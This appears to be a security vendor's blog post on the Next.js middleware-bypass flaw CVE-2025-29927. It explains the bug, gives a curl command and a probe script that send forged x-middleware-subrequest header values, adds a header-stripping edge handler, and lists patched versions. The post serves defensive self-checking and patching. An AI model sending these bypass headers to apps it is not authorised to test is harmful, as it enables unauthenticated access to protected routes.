CVE-2025-29927 one year later: 40% of Next.js apps still vulnerable
The Next.js middleware-bypass vulnerability was disclosed in March 2025, with patched releases already available when the advisory went public. One year later, roughly forty percent of public Next.js apps are still running vulnerable versions. Here is why, and the two-minute check to run on yours.
CVE-2025-29927 is arguably the single most impactful Next.js vulnerability of the last five years: CVSS 9.1, and an unauthenticated attacker bypasses every middleware on a route (including auth) by adding one HTTP header. Patched releases were out by the time the advisory was published, and Datadog Security Labs published a clear breakdown of the bug the following week.
And yet.
Industry estimates put the share of public Next.js apps still exposed to this one-request, unauthenticated middleware bypass at roughly 40%, a full year after the patch shipped.
How the bug works
Next.js middleware can trigger internal sub-requests that pass through the middleware runner again, so the runner needs a way to stop itself from recursing forever. It does this with an internal header, x-middleware-subrequest, whose value is a colon-separated list of the middleware names already visited. Before the patch, the runner trusted that header no matter where the request came from: if the value matched what it expected, it treated the request as a sub-invocation and skipped the middleware entirely. The expected value depends on the release. Older releases skipped as soon as the middleware's name (middleware, or src/middleware when the file lives under src/) appeared in the list at all; releases that later added a recursion-depth check only skip once the name appears five times, so the value becomes middleware:middleware:middleware:middleware:middleware. Either way a client can simply send the right value, and every middleware on the route (auth, rate limiting, geo-blocking) is skipped in one request. The patched releases stop honoring the header from external requests.
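The following is an added illustration written for this post, modelled on the pre-patch logic as described in the public write-ups; it is not Next.js's own code. It shows both generations of the check side by side, the header value each one needs, and a toy request pipeline in which an auth middleware is skipped when the check fires. The request objects and the middleware name are constructed for the example.

```javascript
// Simplified model of the pre-patch x-middleware-subrequest check (illustration
// for this post, not Next.js source). Two generations of the check existed:
// older releases skipped the middleware as soon as its name appeared in the
// header, later releases counted repetitions of the name and skipped once the
// count reached a recursion limit.
const MAX_RECURSION_DEPTH = 5; // the limit used by the later check

function parseSubrequestHeader(value) {
  // The header is a colon-separated chain of middleware names already visited.
  return typeof value === 'string' ? value.split(':') : [];
}

// Older generation: any occurrence of the middleware's name skips it.
function legacySkipsMiddleware(headerValue, middlewareName) {
  return parseSubrequestHeader(headerValue).includes(middlewareName);
}

// Later generation: the name has to appear MAX_RECURSION_DEPTH times.
function depthSkipsMiddleware(headerValue, middlewareName) {
  const depth = parseSubrequestHeader(headerValue)
    .filter((entry) => entry === middlewareName).length;
  return depth >= MAX_RECURSION_DEPTH;
}

// The header value an attacker needs for a given middleware location
// ('middleware' at the project root, 'src/middleware' under src/) and generation.
function bypassValue(middlewareName, generation) {
  return generation === 'legacy'
    ? middlewareName
    : Array(MAX_RECURSION_DEPTH).fill(middlewareName).join(':');
}

// Toy pipeline: the auth middleware redirects anything without a session cookie,
// unless the subrequest check tells the runner to skip it.
function handle(request, { middlewareName, generation }) {
  const skip = generation === 'legacy' ? legacySkipsMiddleware : depthSkipsMiddleware;
  const subrequest = request.headers['x-middleware-subrequest'];
  if (!skip(subrequest, middlewareName)) {
    if (!request.headers.cookie) {
      return { status: 307, location: '/login' };
    }
  }
  return { status: 200, body: 'admin page' };
}

// Constructed requests for the example: one anonymous, one carrying the forged
// header for an app whose middleware lives at src/middleware on a later release.
const anonymous = { headers: {} };
const forged = {
  headers: { 'x-middleware-subrequest': bypassValue('src/middleware', 'depth') },
};
```

Running handle(anonymous, ...) against either generation gives the 307 redirect; running handle(forged, ...) returns the admin page with no cookie at all, which is the whole bug. Note that the single-name value that works on the older generation does not work on the later one, which is why a check against your own app has to try both forms.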
Why it is still live
Three reasons:
1. Self-hosted Next.js is upgrade-heavy. Vercel-hosted apps were protected as soon as the fix shipped; self-hosters on Docker, AWS, or Kubernetes keep running whatever version they pinned until someone bumps it.
2. Tests for this bug are invisible. Unit tests of your middleware still pass, because the bug is in the Next.js runner, not in your middleware function. Only a test that sends the header to the running app would fail.
3. No default scanner probes the running app. Dependency scanners such as Snyk or Dependabot flag the pinned version, but only where they are enabled and someone acts on the alert; CodeQL under GitHub Advanced Security matches code patterns, not live URLs.
Check your app yourself in under two minutes
Send a crafted request to a middleware-protected route on your own app, leaving redirects unfollowed so you see the real status code:
curl -s -o /dev/null -w "%{http_code}\n" -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" https://your-app/admin
Replace the route with any middleware-protected one. Repeat with src/middleware repeated five times if your middleware file lives under src/, and with the single value middleware or src/middleware for older releases. If any of these returns 200 where an unauthenticated request normally gets a redirect or a 401, you are vulnerable. Request Securie access for an automated sweep when your repo is enabled.
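The same check as a small script, written for this post rather than taken from the original page or any vendor tool. It sends a baseline request to one protected route, then one request per candidate header value, and reports which values turned a denial into a 200. The fetch function is injected so the logic runs offline against a stand-in; the optional command-line use at the bottom relies on Node's global fetch (Node 18 or later) and a PROBE_URL environment variable, both assumptions of this example.

```javascript
// Probe one middleware-protected route for the CVE-2025-29927 bypass.
// Added example for this post; fetchImpl is injected so the logic can be
// exercised with a stand-in fetch.
const repeat = (name, n) => Array(n).fill(name).join(':');

// Header values covering both generations of the check and both middleware
// locations (project root and src/).
const CANDIDATE_VALUES = [
  'middleware',
  'src/middleware',
  repeat('middleware', 5),
  repeat('src/middleware', 5),
];

async function probeRoute(fetchImpl, url) {
  // redirect: 'manual' keeps the 3xx so a login redirect is not followed to a 200.
  const baseline = await fetchImpl(url, { redirect: 'manual' });
  const results = [];
  for (const value of CANDIDATE_VALUES) {
    const res = await fetchImpl(url, {
      redirect: 'manual',
      headers: { 'x-middleware-subrequest': value },
    });
    results.push({ value, status: res.status });
  }
  // The probe only means something if the route is gated to begin with:
  // a 200 baseline says the route is public and tells you nothing.
  const gated = baseline.status !== 200;
  const bypassed = gated
    ? results.filter((r) => r.status === 200).map((r) => r.value)
    : [];
  return { baselineStatus: baseline.status, gated, bypassed, results };
}

// Command-line use (assumption: PROBE_URL is set to a protected route):
//   PROBE_URL=https://your-app/admin node probe.js
if (process.env.PROBE_URL && typeof fetch === 'function') {
  probeRoute(fetch, process.env.PROBE_URL).then((report) => {
    console.log(JSON.stringify(report, null, 2));
    process.exitCode = report.bypassed.length > 0 ? 1 : 0;
  });
}
```

A non-empty bypassed list is the confirmation you are looking for; an ungated baseline means you pointed it at a public route and need to pick another one. Run it from outside your network so any edge rule you add later is exercised too.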
If you are vulnerable, the fixes in priority order:
1. Upgrade Next.js to 15.2.3, 14.2.25, 13.5.9, or 12.3.5 depending on your major version.
2. Strip or reject the header at your edge if you cannot upgrade today: a firewall or WAF rule on Vercel or Cloudflare, or a header-removal rule on your reverse proxy. No legitimate external client ever sends x-middleware-subrequest, so dropping it unconditionally is safe.
3. After either fix, re-run the check above against every middleware-gated route and confirm none of them returns 200 with any of the candidate header values.
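The edge mitigation from step 2, as an added example in the shape of a Cloudflare Worker fetch handler; it is not code from the original page, Vercel, or Cloudflare. It removes x-middleware-subrequest from every inbound request before forwarding to origin and counts what it dropped, since the header's presence on an external request is itself an attack indicator worth logging. The fetch function is injected so the logic runs offline; the deployment shape in the comment is an assumption about how you would wire it up.

```javascript
// Edge handler that strips Next.js's internal-only header before the request
// reaches origin. Added example for this post. In a deployed Worker this would be
//   export default { fetch: (req) => forwardWithoutInternalHeaders(req, fetch) };
const INTERNAL_ONLY_HEADERS = ['x-middleware-subrequest'];

// Returns a copy of the request with the internal-only headers removed and the
// number of such headers that were present on the original.
function stripInternalHeaders(request) {
  const headers = new Headers(request.headers); // Headers is case-insensitive
  let stripped = 0;
  for (const name of INTERNAL_ONLY_HEADERS) {
    if (headers.has(name)) {
      headers.delete(name);
      stripped += 1;
    }
  }
  return { request: new Request(request, { headers }), stripped };
}

async function forwardWithoutInternalHeaders(request, fetchImpl) {
  const { request: clean, stripped } = stripInternalHeaders(request);
  if (stripped > 0) {
    // Nobody legitimate sends this header from outside: log it as a probe.
    console.warn(`dropped ${stripped} internal-only header(s) on ${new URL(request.url).pathname}`);
  }
  return fetchImpl(clean);
}
```

Stripping rather than rejecting keeps availability intact for a client that happens to send junk headers while still removing the attacker's only lever; if you prefer a hard 403, return it when stripped is non-zero instead of forwarding. Either way, this only works if all traffic to the Next.js process actually passes through the edge, so check that origin is not reachable directly.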
Longer term
Middleware should not be your primary auth boundary. Use it for rate limiting, geo rules, and cheap early redirects, but verify identity inside the route handler, server component, or data layer that actually serves protected data. With that in place, a bug in the CVE-2025-29927 class degrades from critical to medium even when a fresh one ships: the attacker gets past the redirect and finds a 401 behind it.